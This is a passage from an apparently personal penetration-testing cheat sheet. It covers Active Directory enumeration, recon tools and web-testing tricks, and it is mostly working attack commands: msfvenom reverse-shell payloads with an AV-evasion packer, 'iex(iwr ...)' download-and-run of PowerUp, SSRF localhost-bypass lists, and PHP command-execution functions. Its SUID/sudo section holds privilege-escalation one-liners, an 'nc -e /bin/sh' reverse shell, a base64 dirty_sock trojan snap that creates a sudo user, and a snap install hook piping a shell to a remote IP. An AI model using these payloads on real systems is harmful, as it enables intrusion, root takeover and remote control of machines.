[System.DirectoryServices.ActiveDirectory.Forest]::GetCurrentForest().Name 2364 | [System.DirectoryServices.ActiveDirectory.Forest]::GetCurrentForest().Sites 2365 | [System.DirectoryServices.ActiveDirectory.Forest]::GetCurrentForest().Domains 2366 | [System.DirectoryServices.ActiveDirectory.Forest]::GetCurrentForest().GlobalCatalogs 2367 | [System.DirectoryServices.ActiveDirectory.Forest]::GetCurrentForest().ApplicationPartitions 2368 | [System.DirectoryServices.ActiveDirectory.Forest]::GetCurrentForest().ForestMode 2369 | [System.DirectoryServices.ActiveDirectory.Forest]::GetCurrentForest().RootDomain 2370 | [System.DirectoryServices.ActiveDirectory.Forest]::GetCurrentForest().Schema 2371 | [System.DirectoryServices.ActiveDirectory.Forest]::GetCurrentForest().SchemaRoleOwner 2372 | [System.DirectoryServices.ActiveDirectory.Forest]::GetCurrentForest().NamingRoleOwner 2373 | ===================== 2374 | 2375 | 2376 | # .Net Method References 2377 | https://adsecurity.org/?p=113 2378 | ``` 2379 | 2380 | ### Waybackurls 2381 | 2382 | ```bash 2383 | # Install 2384 | go get github.com/tomnomnom/waybackurls 2385 | 2386 | # Commands 2387 | cat comain.txt| waybackurls > wayback.txt 2388 | ``` 2389 | 2390 | ### Gau 2391 | 2392 | ```bash 2393 | # Download 2394 | GO111MODULE=on go get -u -v github.com/lc/gau 2395 | 2396 | # References 2397 | https://github.com/lc/gau 2398 | ``` 2399 | 2400 | ### Assetfinder 2401 | 2402 | ```bash 2403 | # Download/Install 2404 | sudo apt install assetfinder 2405 | ``` 2406 | 2407 | ### Dalfox 2408 | 2409 | ```bash 2410 | # Download/Install 2411 | GO111MODULE=on go get -v github.com/hahwul/dalfox/v2 2412 | 2413 | # References 2414 | https://github.com/hahwul/dalfox 2415 | ``` 2416 | 2417 | ### PowerUpSQL.ps1 2418 | 2419 | ```code 2420 | => Commands 2421 | $ Get-SQLInstanceLocal -Verbose 2422 | $ Get-SQLInstanceDomain -Verbose 2423 | $ Get-SQLServerInfo -Verbose -Instance query.bank.local 2424 | $ Invoke-SQLAudit -Verbose -Instance query.bank.local 2425 | $ Get-SQLQuery -instance query.bank.local -query "select * from master..sysservers" 2426 | 2427 | => References 2428 | $ https://github.com/NetSPI/PowerUpSQL/wiki/PowerUpSQL-Cheat-Sheet 2429 | ``` 2430 | 2431 | ### PowerUp.ps1 2432 | 2433 | ```bash 2434 | => Download 2435 | $ iex(iwr -usebasicparsing https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Privesc/PowerUp.ps1)) 2436 | 2437 | => Command 2438 | $ Invoke-AllChecks 2439 | $ Find-ProcessDLLHijack 2440 | 2441 | => References 2442 | $ https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Privesc/PowerUp.ps1 2443 | ``` 2444 | 2445 | ### Windows Vulnerable Machine (Setup/Ready) 2446 | 2447 | ```bash 2448 | => References 2449 | $ https://github.com/RedTeamOperations/Vulnerable_Machine/blob/master/Escalate%20-%20A%20Windows%20Vulnerable%20Virtual%20Machine 2450 | $ https://github.com/Tib3rius/Windows-PrivEsc-Setup 2451 | ``` 2452 | 2453 | ### Linux Vulnerable Machine (Setup/Ready) 2454 | 2455 | ```bash 2456 | => References 2457 | $ https://github.com/RedTeamOperations/Vulnerable_Machine/blob/master/Escalate%20-%20A%20Linux%20Vulnerable%20Virtual%20Machine 2458 | 2459 | ``` 2460 | 2461 | ### Inveigh 2462 | 2463 | ```bash 2464 | => Commands 2465 | $ Invoke-InveighRelay -ConsoleOutput -Y -StatusOutput N -Command "net user commandtest Passw0rd123! $ /add" -Attack Enumerate,Execute,Session 2466 | $ Invoke-Inveigh -ConsoleOutput Y 2467 | $ Stop-Inveigh 2468 | $ Invoke-Inveigh -FileOutput Y 2469 | ``` 2470 | ### Metasploit 2471 | 2472 | ``` 2473 | => Set Proxies 2474 | $ set PROXIES HTTP:127.0.0.1:8080 2475 | $ set ReverseAllowProxy true 2476 | 2477 | => Mimikatz 2478 | $ load mimikatz 2479 | 2480 | => Commands 2481 | $ ps 2482 | $ help 2483 | 2484 | => Msfvenom 2485 | $ msfvenom -p php/meterpreter/reverse_tcp LHOST=tun0 LPORT=443 -f raw -o shell.php 2486 | ``` 2487 | 2488 | ### Nessus 2489 | 2490 | ```bash 2491 | => Download 2492 | $ https://www.tenable.com/downloads/nessus 2493 | 2494 | => Install 2495 | $ sudo apt install ./Nessus-8.14.0-debian6_amd64.deb 2496 | 2497 | => Start 2498 | $ sudo /bin/systemctl start nessusd.service 2499 | 2500 | => Stop 2501 | $ sudo /bin/systemctl stop nessusd.service 2502 | 2503 | => Web 2504 | $ https://localhost:8834/ 2505 | 2506 | => No PDF? 2507 | $ Install Java on the machine 2508 | $ Follow the steps in here : https://community.tenable.com/s/article/PDF-Option-is-Missing-in-Nessus 2509 | ``` 2510 | 2511 | ### CobaltStrikeParser 2512 | 2513 | ```bash 2514 | # Download 2515 | https://github.com/Apr4h/CobaltStrikeScan 2516 | 2517 | # Commands 2518 | python3 parse_beacon_config.py beacon.exe 2519 | 2520 | # Information we can get 2521 | - SleepTime 2522 | - Jitter 2523 | - PublicKey_MD5 2524 | - Port 2525 | - BeaconType 2526 | - HttpPostUri 2527 | - Many more 2528 | ``` 2529 | 2530 | ### Sharperner 2531 | 2532 | ```bash 2533 | # Download 2534 | https://github.com/aniqfakhrul/Sharperner 2535 | 2536 | # Commands 2537 | msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=eth0 LPORT=443 -f base64 2538 | .\Sharperner.exe /file:base64.txt /key:'nothinghere' /out:payload.exe 2539 | 2540 | ``` 2541 | 2542 | ### TruffleHog 2543 | 2544 | ```bash 2545 | [Install truffleHog] 2546 | pip install truffleHog 2547 | 2548 | [Usage] 2549 | trufflehog --regex --entropy=False https://github.com/example/example.git 2550 | 2551 | [References] 2552 | https://github.com/trufflesecurity/truffleHog 2553 | ``` 2554 | 2555 | ### GhostWriter 2556 | 2557 | ```bash 2558 | => Download 2559 | $ https://github.com/GhostManager/Ghostwriter 2560 | 2561 | => =====Take Substring===== 2562 | $ {{ finding.title[1:6] }} 2563 | $ {{ finding.title[1:-1] }} 2564 | $ {{ finding.title[1:] }} 2565 | 2566 | => =====Set List===== 2567 | $ {% set list_web = ['WEB01','WEB02'] %} 2568 | 2569 | => =====Example(1) Iteration===== 2570 | {% for x in list_web %} 2571 | {{ x }} 2572 | {% endfor %} 2573 | 2574 | => ====Example(2) Iteration==== 2575 | {% for x in list_web %} 2576 | {{ forloop.counter }} # starting index 1 2577 | {{ forloop.counter0 }} # starting index 0 2578 | {% endfor %} 2579 | 2580 | => =====Example(1) IfElse===== 2581 | {% if 'web' in x %} 2582 | yes 2583 | {% endif %} 2584 | 2585 | => ====Inside findings==== 2586 | $ https://github.com/GhostManager/Ghostwriter/blob/ee24eb299c0e66b6b718eb3ecf5f084685b526f0/ghostwriter/reporting/models.py 2587 | {% for findings in findings %} 2588 | {{ finding.title }} 2589 | {{ finding.position }} 2590 | {{ finding.affected_entities }} 2591 | {{ finding.description }} 2592 | {{ finding.impact }} 2593 | {{ finding.mitigation }} 2594 | {{ finding.replication_steps }} 2595 | {{ finding.host_detection }} 2596 | {{ finding.network_detection }} 2597 | {{ finding.references }} 2598 | {{ finding.finding_guidance }} 2599 | {{ finding.complete }} 2600 | # Foreign Keys 2601 | {{ finding.severity }} 2602 | {{ finding.finding_type }} 2603 | {{ finding.report }} 2604 | {% endfor % } 2605 | 2606 | => ====Inside target==== 2607 | $ https://github.com/GhostManager/Ghostwriter/blob/ee24eb299c0e66b6b718eb3ecf5f084685b526f0/ghostwriter/rolodex/models.py 2608 | {% for targets in target %} 2609 | {{ targets.ip_address }} 2610 | {{ targets.hostname }} 2611 | {{ targets.note }} 2612 | {{ targets.compromised }} 2613 | # Foreign Keys 2614 | {{ targets.project }} 2615 | {% endfor % } 2616 | 2617 | ``` 2618 | 2619 | ### Sqlmap 2620 | 2621 | ``` 2622 | => Command 2623 | $ sqlmap -u "http://example.com/" --data "a=1&b=2&c=3" -p "a,b" --method POST 2624 | $ sqlmap -u "http://example.com/?a=1&b=2&c=3" -p "a,b" 2625 | $ sqlmap -r post.req --level=5 --risk=3 --os-shell 2626 | $ sqlmap -r item.req --proxy http://127.0.0.1:8080 --level 4 --risk 3 -p parameters --technique=S --dbms=mssql --batch --random-agent --force-ssl -D databases -T tables -C columns --dump --flush 2627 | $ sqlmap -r item.req --proxy http://127.0.0.1:8080 --level 4 --risk 3 -p parameters --technique=S --dbms=mssql --batch --random-agent --force-ssl --sql-query="select len(coumns) from tables;" 2628 | ``` 2629 | 2630 | ### Nim 2631 | 2632 | ``` 2633 | => Download 2634 | $ https://nim-lang.org/ 2635 | 2636 | => Commands 2637 | $ nim c .\practice.nim 2638 | 2639 | => Variables 2640 | $ var age: int 2641 | $ var ageSpecified: int = 25 2642 | $ var variableImplicit = "Hello" 2643 | $ var my_variable != var My_variable 2644 | $ var my_variable == var myVariable 2645 | 2646 | => Function 2647 | Void 2648 | proc header(): void = 2649 | echo "here" 2650 | 2651 | => Output 2652 | $ echo "Age: ", ageSpecified 2653 | 2654 | => Install (Nimble) 2655 | $ nimble install winim 2656 | 2657 | => References 2658 | $ https://github.com/byt3bl33d3r/OffensiveNim 2659 | $ https://blog.eduonix.com/web-programming-tutorials/nim-programming-language-syntaxes/ 2660 | $ https://ajpc500.github.io/nim/Shellcode-Injection-using-Nim-and-Syscalls/ 2661 | $ https://github.com/ajpc500/NimlineWhispers 2662 | $ https://gist.github.com/ChoiSG/e0a7f5949638dfe363bcd418d94dcc34 2663 | $ https://ilankalendarov.github.io/posts/nim-ransomware/ 2664 | $ https://s3cur3th1ssh1t.github.io/Playing-with-OffensiveNim/ 2665 | ``` 2666 | 2667 | ### Cs 2668 | 2669 | ```bash 2670 | # Split By Whitespace and append every end words 2671 | passPhrase = "aa bb cc dd ee ff"; 2672 | passPhrase = string.Join("\"" + Environment.NewLine + "\"", passPhrase.Split() 2673 | .Select((word, index) => new { word, index }) 2674 | .GroupBy(x => x.index / 2) 2675 | .Select(grp => string.Join(" ", grp.Select(x => x.word)))); 2676 | 2677 | ``` 2678 | 2679 | ### Bypass 403 (Forbidden) 2680 | 2681 | ```bash 2682 | => Tools 2683 | $ https://github.com/lobuhi/byp4xx 2684 | -> ./byp4xx.sh -c "http://localhost/" 2685 | $ https://github.com/iamj0ker/bypass-403 2686 | 2687 | => Header 2688 | $ X-Originating-IP: 127.0.0.1 2689 | $ X-Forwarded-For: 127.0.0.1 2690 | $ X-Remote-IP: 127.0.0.1 2691 | $ X-Remote-Addr: 127.0.0.1 2692 | $ X-Original-URL: /admin 2693 | $ X-Rewrite-URL: /admin 2694 | ``` 2695 | 2696 | ### Mobsfscan 2697 | 2698 | ```bash 2699 | # Download 2700 | https://github.com/MobSF/mobsfscan 2701 | ``` 2702 | 2703 | ### Evil-Winrm 2704 | 2705 | ```bash 2706 | # Commands 2707 | evil-winrm -u 'Administrator' -H '370ddcf45959b2293427baa70376e14e' -i 10.10.10.10 2708 | ``` 2709 | 2710 | ### Reminna 2711 | 2712 | ```bash 2713 | # Download 2714 | https://remmina.org/how-to-install-remmina/ 2715 | 2716 | # Installing 2717 | sudo apt install software-properties-common 2718 | sudo apt update 2719 | sudo apt-add-repository ppa:remmina-ppa-team/remmina-next 2720 | sudo apt update 2721 | sudo apt install remmina remmina-plugin-rdp remmina-plugin-secret 2722 | sudo killall remmina 2723 | sudo remmina 2724 | ``` 2725 | 2726 | ### Sysmon 2727 | 2728 | ```bash 2729 | # Download 2730 | https://docs.microsoft.com/en-us/sysinternals/downloads/sysmon 2731 | 2732 | # Event 2733 | Event ID 1: Process creation 2734 | Event ID 2: A process changed a file creation time 2735 | Event ID 3: Network connection 2736 | Event ID 4: Sysmon service state changed 2737 | Event ID 5: Process terminated 2738 | Event ID 6: Driver loaded 2739 | Event ID 7: Image loaded 2740 | Event ID 8: CreateRemoteThread 2741 | Event ID 9: RawAccessRead 2742 | Event ID 10: ProcessAccess 2743 | Event ID 11: FileCreate 2744 | Event ID 12: RegistryEvent (Object create and delete) 2745 | Event ID 13: RegistryEvent (Value Set) 2746 | Event ID 14: RegistryEvent (Key and Value Rename) 2747 | Event ID 15: FileCreateStreamHash 2748 | Event ID 16: ServiceConfigurationChange 2749 | Event ID 17: PipeEvent (Pipe Created) 2750 | Event ID 18: PipeEvent (Pipe Connected) 2751 | Event ID 19: WmiEvent (WmiEventFilter activity detected) 2752 | Event ID 20: WmiEvent (WmiEventConsumer activity detected) 2753 | Event ID 21: WmiEvent (WmiEventConsumerToFilter activity detected) 2754 | Event ID 22: DNSEvent (DNS query) 2755 | Event ID 23: FileDelete (File Delete archived) 2756 | Event ID 24: ClipboardChange (New content in the clipboard) 2757 | Event ID 25: ProcessTampering (Process image change) 2758 | Event ID 26: FileDeleteDetected (File Delete logged) 2759 | Event ID 255: Error 2760 | 2761 | 2762 | # References 2763 | https://github.com/SwiftOnSecurity/sysmon-config 2764 | https://github.com/trustedsec/SysmonCommunityGuide 2765 | ``` 2766 | 2767 | ### Scp 2768 | 2769 | ```bash 2770 | # Commands 2771 | scp -P 2249 file.txt user@10.10.10.:. 2772 | ``` 2773 | 2774 | ### Mdb 2775 | 2776 | ```bash 2777 | # Download MdbTools 2778 | sudo apt install mdbtools 2779 | 2780 | # Commands 2781 | mdb-tables file.mdb 2782 | mdb-tables -T backup.mdb 2783 | mdb-sql file.mdb 2784 | * list tables 2785 | * go 2786 | 2787 | # Tricks 2788 | for i in $(mdb-tables -T backup.mdb | cut -d' ' -f2);do mdb-export -H backup.mdb $i > /tmp/test; sed "s/.*(//g" /tmp/test | sed 's/"//g' | sed "s/).*//g" | tr , '\n' >> word.txt;done 2789 | ``` 2790 | 2791 | ### Evolution 2792 | 2793 | ```bash 2794 | # Install 2795 | sudo apt-get install evolution evolution-plugins 2796 | 2797 | # Commands 2798 | evolution 2799 | 2800 | # References 2801 | https://rc.partners.org/kb/article/2702 2802 | ``` 2803 | 2804 | ### readpst 2805 | 2806 | ```bash 2807 | # Install 2808 | sudo apt-get install -y pst-utils 2809 | 2810 | # Commands 2811 | readpst file.pst 2812 | cat file.mbox 2813 | ``` 2814 | 2815 | ### Docker 2816 | 2817 | ```bash 2818 | => Commands 2819 | $ docker images 2820 | $ docker image ls 2821 | $ docker pull ubuntu 2822 | $ docker run -it ubuntu 2823 | $ docker run -it 2824 | $ docker build /path_to_Dockerfile/ 2825 | $ docker rmi -f 2826 | 2827 | => Curl 2828 | $ curl --unix-socket /var/run/docker.sock -H "Content-Type: application/json" 2829 | $ curl -s localhost:8080/images/json -H "Content-Type: application/json" 2830 | 2831 | => Api 2832 | $ /images/json 2833 | $ /container/json 2834 | 2835 | => References 2836 | $ https://securityboulevard.com/2019/02/abusing-docker-api-socket/ 2837 | $ https://github.com/flast101/docker-privesc 2838 | ``` 2839 | 2840 | ### Docker-compose 2841 | 2842 | ```bash 2843 | # Commands 2844 | docker-compose up --build --force-recreate -d 2845 | docker-compose up --build -d 2846 | 2847 | # References 2848 | https://docs.docker.com/compose/install/ 2849 | ``` 2850 | 2851 | ### Dockerfile 2852 | 2853 | ```bash 2854 | #====Example==== 2855 | FROM node:7-onbuild 2856 | LABEL maintainer "test@example.com" 2857 | HEALTHCHECK --interval=5s \ 2858 | --timeout=5s \ 2859 | CMD curl -f http;//127.0.0.1:8000 || exit 1 2860 | EXPOSE 8000 2861 | 2862 | #====Example==== 2863 | ``` 2864 | 2865 | ### Jenkinsfile 2866 | 2867 | ```bash 2868 | #====Example==== 2869 | node { 2870 | def app 2871 | 2872 | stage('Clone repository'){ 2873 | checkout scm 2874 | } 2875 | stage('Build iamge'){ 2876 | app = docker.build("username/docker") 2877 | } 2878 | stage('Test image'){ 2879 | app.inside { 2880 | sh 'echo "Tests passed"' 2881 | } 2882 | } 2883 | stage('Push image'){ 2884 | docker.withRegistry('https://registry.hub.docker.com','docker-hub-credentials'){ 2885 | app.push("$(env.BUILD_NUMBER)") 2886 | app.push("latest") 2887 | } 2888 | } 2889 | } 2890 | ``` 2891 | 2892 | ### PHP 2893 | 2894 | ```bash 2895 | ====Comparisons==== 2896 | var_dump(0 == "a"); // 0 == 0 -> true 2897 | var_dump("1" == "01"); // 1 == 1 -> true 2898 | var_dump("10" == "1e1"); // 10 == 10 -> true 2899 | var_dump(100 == "1e2"); // 100 == 100 -> true 2900 | var_dump(.0 == "00"); // 0 == 0 2901 | 2902 | ====is_numeric()==== 2903 | is_numeric(" \t\r\n 123") => true 2904 | is_numeric(' 87') => true 2905 | is_numeric('87 ') => false 2906 | is_numeric(' 87 ') => false 2907 | is_numeric('0xdeadbeef') 2908 | 2909 | # Returns True 2910 | ' -.0' 2911 | '0.' 2912 | ' +2.1e5' 2913 | ' -1.5E+25' 2914 | '1.e5' 2915 | '9e9' 2916 | 2917 | ====preg_replace()==== 2918 | #Example1 2919 | preg_replace('/a/e', 'sYstEm(ls)', 'aaaa'); 2920 | 2921 | #Example2 2922 | preg_replace('/a/e', '$output = `cat flag.txt`; echo "
$output
";', 'aaaa'); 2923 | 2924 | #Example3 2925 | preg_replace('/a/e', 'sYstEm("ls")', 'aaaa'); 2926 | 2927 | ====Command Execution==== 2928 | #exec() 2929 | exec("whoami"); 2930 | 2931 | #passthru() 2932 | passthru("whoami"); 2933 | 2934 | #system() 2935 | system("whoami"); 2936 | 2937 | #shell_exec() 2938 | shell_exec("whoami"); 2939 | 2940 | #backticks (use shell_exec) 2941 | `whoami`; 2942 | 2943 | #popen() 2944 | popen("whoami","r"); 2945 | 2946 | #proc_open() 2947 | proc_open("whoami"); 2948 | 2949 | #pcntl_exec 2950 | pcntl_exec("whoami"); 2951 | 2952 | ====Read Files==== 2953 | #readfile() 2954 | readfile("/etc/hosts"); 2955 | 2956 | #file_get_contents() 2957 | file_get_contents("/etc/hosts"); 2958 | 2959 | #fopen()/fread() 2960 | fread(fopen("/etc/hosts","r"),filesize("/etc/hosts")); 2961 | 2962 | #include_once(); 2963 | include_once('/etc/hosts'); 2964 | 2965 | #include(); 2966 | include('/etc/hosts'); 2967 | 2968 | #require_once() 2969 | require_once('/etc/hosts'); 2970 | 2971 | #require() 2972 | require('/etc/hosts'); 2973 | 2974 | ====List Files/Directories==== 2975 | #opendir() 2976 | 2977 | 2992 | 2993 | #scandir() 2994 | 2995 | 3003 | 3004 | #Readdir() 3005 | 3006 | 3025 | 3026 | #Glob() 3027 | 3028 | 3033 | 3034 | #Information Disclosure 3035 | phpinfo 3036 | posix_mkfifo 3037 | posix_getlogin 3038 | posix_ttyname 3039 | getenv 3040 | get_current_user 3041 | proc_get_status 3042 | get_cfg_var 3043 | disk_free_space 3044 | disk_total_space 3045 | diskfreespace 3046 | getcwd 3047 | getlastmo 3048 | getmygid 3049 | getmyinode 3050 | getmypid 3051 | getmyuid 3052 | 3053 | 3054 | # References 3055 | - https://github.com/w181496/Web-CTF-Cheatsheet 3056 | - https://stackoverflow.com/questions/3115559/exploitable-php-functions 3057 | - https://wiki.x10sec.org/web/php/php/ 3058 | 3059 | ``` 3060 | 3061 | ### Tmux Commands 3062 | 3063 | ```bash 3064 | => Start new session 3065 | $ tmux new -s newsession 3066 | 3067 | => Split Pane Vertically 3068 | $ Ctrl + b + " 3069 | 3070 | => Split Pane Horizontally 3071 | $ Ctrl + b + % 3072 | 3073 | => List session 3074 | $ tmux ls 3075 | 3076 | => Attach to last session 3077 | $ tmux a 3078 | 3079 | => Attach to specific session 3080 | $ tmux a -t newsession 3081 | 3082 | => Toogle Pane Zoom 3083 | $ Ctrl + b + z 3084 | 3085 | => Create new window 3086 | $ Ctrl + b + c 3087 | 3088 | => Next Windows 3089 | $ Ctrl + b + n 3090 | 3091 | => 3092 | 3093 | => References 3094 | https://tmuxcheatsheet.com/ 3095 | ``` 3096 | 3097 | ### Vim Commands 3098 | 3099 | ```bash 3100 | => References 3101 | $ https://vim.rtorr.com/ 3102 | ``` 3103 | 3104 | ### Firebird 3105 | 3106 | ```bash 3107 | # Commands 3108 | 3109 | # References 3110 | ``` 3111 | 3112 | ### SSRF (Server Side Request Forgery) 3113 | 3114 | ```bash 3115 | # List 3116 | http://127.0.0.1 3117 | http://127.1 3118 | http://0 3119 | http://0.0.0.0 3120 | http://localhost 3121 | http://[::] 3122 | http://[0000::1] 3123 | http://[0:0:0:0:0:ffff:127.0.0.1] 3124 | http://①②⑦.⓪.⓪.⓪ 3125 | http://127.127.127.127 3126 | http://127.0.1.3 3127 | http://127.0.0.0 3128 | http://2130706433/ 3129 | http://017700000001 3130 | http://3232235521/ 3131 | http://3232235777/ 3132 | http://0x7f000001/ 3133 | http://0xc0a80014/ 3134 | http://{domain}@127.0.0.1 3135 | http://127.0.0.1#{domain} 3136 | http://{domain}.127.0.0.1 3137 | http://127.0.0.1/{domain} 3138 | http://127.0.0.1/?d={domain} 3139 | https://{domain}@127.0.0.1 3140 | https://127.0.0.1#{domain} 3141 | https://{domain}.127.0.0.1 3142 | https://127.0.0.1/{domain} 3143 | https://127.0.0.1/?d={domain} 3144 | http://{domain}@localhost 3145 | http://localhost#{domain} 3146 | http://{domain}.localhost 3147 | http://localhost/{domain} 3148 | http://localhost/?d={domain} 3149 | http://127.0.0.1%00{domain} 3150 | http://127.0.0.1?{domain} 3151 | http://127.0.0.1///{domain} 3152 | https://127.0.0.1%00{domain} 3153 | https://127.0.0.1?{domain} 3154 | https://127.0.0.1///{domain} 3155 | 3156 | # References 3157 | https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery 3158 | ``` 3159 | 3160 | ### Cl.exe 3161 | 3162 | ```bash 3163 | # Commands 3164 | -> cmd /c 'call "C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\VC\Auxiliary\Build\vcvars64.bat" && cl /LD calc.c ' 3165 | 3166 | ``` 3167 | 3168 | ### Core File Dumps 3169 | 3170 | ```bash 3171 | # Crash 3172 | kill -SIGBUS 3173 | 3174 | # Unpack 3175 | apport-unpack /var/crash/.crash /tmp/newdirectory 3176 | 3177 | # View Dump 3178 | strings CoreDump 3179 | 3180 | # Enable CoreDump Generation 3181 | prctl(PR_SET_DUMPABLE, 1); 3182 | 3183 | # References 3184 | -> https://access.redhat.com/solutions/4896 3185 | ``` 3186 | 3187 | ### Bash Tricks 3188 | 3189 | ```bash 3190 | (1) Write Multiple Lines 3191 | cat >note.txt <<'EOL' 3192 | 3193 | 3194 | EOL 3195 | 3196 | ``` 3197 | 3198 | # C. SUID/CAP/SUDO/GROUP 3199 | 3200 | ### Python 3201 | 3202 | ```bash 3203 | # SUID 3204 | python -c 'import os; os.execl("/bin/sh", "sh", "-p")' 3205 | python2.7 -c 'import os; os.execl("/bin/sh", "sh", "-p")' 3206 | 3207 | # Capabilities 3208 | python -c 'import os; os.setuid(0); os.system("/bin/sh")' 3209 | python2.7 -c 'import os; os.setuid(0); os.system("/bin/sh")' 3210 | python3.8 -c 'import os; os.setuid(0); os.system("/bin/sh")' 3211 | 3212 | # SUDO 3213 | sudo python3 /pathto/script.py 3214 | 3215 | # Notes (Found) 3216 | eval('144+0|__import__("os").system("nc -e /bin/sh 10.10.10.10 443")') 3217 | ``` 3218 | 3219 | ### LXD 3220 | 3221 | ```bash 3222 | #If No Internet Access 3223 | 1. git clone https://github.com/saghul/lxd-alpine-builder.git 3224 | 2. cd lxd-alpine-builder 3225 | 3. ./build-alpine 3226 | 4. Upload file.tar.gz into target machine 3227 | 5. lxc image import ./apline-v3.10-x86_64-20191008_1227.tar.gz --alias myimage 3228 | 6. lxc init myimage ignite -c security.privileged=true 3229 | 7. lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true 3230 | 8. lxc start ignite 3231 | 9. lxc exec ignite /bin/sh 3232 | ``` 3233 | 3234 | ### Gimp 3235 | 3236 | ```bash 3237 | # SUID 3238 | gimp -idf --batch-interpreter=python-fu-eval -b 'import os; os.execl("/bin/sh", "sh", "-p")' 3239 | 3240 | # References 3241 | https://gtfobins.github.io/gtfobins/gimp/ 3242 | ``` 3243 | 3244 | ### Gdb 3245 | 3246 | ```bash 3247 | # SUID 3248 | gdb -nx -ex 'python import os; os.execl("/bin/sh", "sh", "-p")' -ex quit 3249 | 3250 | # SUDO 3251 | sudo gdb -nx -ex '!sh' -ex quit 3252 | 3253 | # Capabilities 3254 | gdb -nx -ex 'python import os; os.setuid(0)' -ex '!sh' -ex quit 3255 | 3256 | # References 3257 | https://gtfobins.github.io/gtfobins/gdb/ 3258 | ``` 3259 | 3260 | ### Node 3261 | 3262 | ```bash 3263 | # Sudo 3264 | sudo node -e 'child_process.spawn("/bin/sh", {stdio: [0, 1, 2]})' 3265 | ``` 3266 | 3267 | ### Maidag 3268 | 3269 | ```bash 3270 | # Sudo 3271 | - Create one file /tmp/passwd 3272 | - echo -e "\nnewuser:c.gVrEYFACZTQ:0:0:root:/root:/bin/bash" > /tmp/passwd 3273 | - sudo maidag --url '/etc/passwd' < /tmp/passwd 3274 | - su newuser 3275 | ``` 3276 | 3277 | ### Folder (Suid) 3278 | 3279 | ```bash 3280 | - If there is a folder with SUID 3281 | - And it is a webserver 3282 | - Try to upload php reverse shell 3283 | - Access it from web 3284 | ``` 3285 | 3286 | ### Cat 3287 | 3288 | ```bash 3289 | # Sudo 3290 | sudo /bin/cat /opt/games/../../../etc/passwd 3291 | ``` 3292 | 3293 | ### Qpdf 3294 | 3295 | ```code 3296 | # Install 3297 | sudo apt install qpdf 3298 | 3299 | # Commands 3300 | qpdf --encrypt password password 40 -- test.pdf test2.pdf 3301 | qpdf --password=password --decrypt test2.pdf test.pdf 3302 | ``` 3303 | 3304 | ### Snap 3305 | 3306 | ```bash 3307 | # Sudo 3308 | # Malicious snap to create dirty_sock:dirty_sock 3309 | 3310 | ## python3 snapmal.py 3311 | import base64 3312 | 3313 | TROJAN_SNAP = (''' 3314 | aHNxcwcAAAAQIVZcAAACAAAAAAAEABEA0AIBAAQAAADgAAAAAAAAAI4DAAAAAAAAhgMAAAAAAAD/ 3315 | /////////xICAAAAAAAAsAIAAAAAAAA+AwAAAAAAAHgDAAAAAAAAIyEvYmluL2Jhc2gKCnVzZXJh 3316 | ZGQgZGlydHlfc29jayAtbSAtcCAnJDYkc1daY1cxdDI1cGZVZEJ1WCRqV2pFWlFGMnpGU2Z5R3k5 3317 | TGJ2RzN2Rnp6SFJqWGZCWUswU09HZk1EMXNMeWFTOTdBd25KVXM3Z0RDWS5mZzE5TnMzSndSZERo 3318 | T2NFbURwQlZsRjltLicgLXMgL2Jpbi9iYXNoCnVzZXJtb2QgLWFHIHN1ZG8gZGlydHlfc29jawpl 3319 | Y2hvICJkaXJ0eV9zb2NrICAgIEFMTD0oQUxMOkFMTCkgQUxMIiA+PiAvZXRjL3N1ZG9lcnMKbmFt 3320 | ZTogZGlydHktc29jawp2ZXJzaW9uOiAnMC4xJwpzdW1tYXJ5OiBFbXB0eSBzbmFwLCB1c2VkIGZv 3321 | ciBleHBsb2l0CmRlc2NyaXB0aW9uOiAnU2VlIGh0dHBzOi8vZ2l0aHViLmNvbS9pbml0c3RyaW5n 3322 | L2RpcnR5X3NvY2sKCiAgJwphcmNoaXRlY3R1cmVzOgotIGFtZDY0CmNvbmZpbmVtZW50OiBkZXZt 3323 | b2RlCmdyYWRlOiBkZXZlbAqcAP03elhaAAABaSLeNgPAZIACIQECAAAAADopyIngAP8AXF0ABIAe 3324 | rFoU8J/e5+qumvhFkbY5Pr4ba1mk4+lgZFHaUvoa1O5k6KmvF3FqfKH62aluxOVeNQ7Z00lddaUj 3325 | rkpxz0ET/XVLOZmGVXmojv/IHq2fZcc/VQCcVtsco6gAw76gWAABeIACAAAAaCPLPz4wDYsCAAAA 3326 | AAFZWowA/Td6WFoAAAFpIt42A8BTnQEhAQIAAAAAvhLn0OAAnABLXQAAan87Em73BrVRGmIBM8q2 3327 | XR9JLRjNEyz6lNkCjEjKrZZFBdDja9cJJGw1F0vtkyjZecTuAfMJX82806GjaLtEv4x1DNYWJ5N5 3328 | RQAAAEDvGfMAAWedAQAAAPtvjkc+MA2LAgAAAAABWVo4gIAAAAAAAAAAPAAAAAAAAAAAAAAAAAAA 3329 | AFwAAAAAAAAAwAAAAAAAAACgAAAAAAAAAOAAAAAAAAAAPgMAAAAAAAAEgAAAAACAAw'''+ 'A' * 4256 + '==') 3330 | 3331 | blob = base64.b64decode(TROJAN_SNAP) 3332 | file = open("sample.snap", "wb") 3333 | file.write(blob) 3334 | file.close() 3335 | 3336 | # Run 3337 | sudo snap install --dangerous --devmode exploit.snap 3338 | 3339 | #another method sudo install 3340 | [Sudo snap install] 3341 | COMMAND="rm /tmp/f;mkfifo /tmp/f;cat /tmp/f | /bin/sh -i 2>&1 | nc 10.10.14.23 443 >/tmp/f" 3342 | cd $(mktemp -d) 3343 | mkdir -p meta/hooks 3344 | printf '#!/bin/sh\n%s; false' "$COMMAND" >meta/hooks/install 3345 | chmod +x meta/hooks/install 3346 | fpm -n xxxx -s dir -t snap -a all meta 3347 | 3348 | # Commands 3349 | sudo /usr/bin/snap install test.snap --dangerous --devmode 3350 | ``` 3351 | 3352 | ### Msfconsole 3353 | 3354 | ```bash 3355 | # Sudo 3356 | sudo msfconsole -x bash 3357 | 3358 | # Commands 3359 | ``` 3360 | 3361 | ### Docker 3362 | 3363 | ```bash 3364 | # Group docker 3365 | 3366 | ``` 3367 | 3368 | ### Initctl 3369 | 3370 | ```bash 3371 | # Save as test.conf in /etc/init/testconf 3372 | description "Test node.js server" 3373 | author "root" 3374 | 3375 | script 3376 | exec /usr/local/share/nodebrew/node/v8.9.4/bin/node /tmp/reverse.js 3377 | end script 3378 | 3379 | # Nodejs - save as 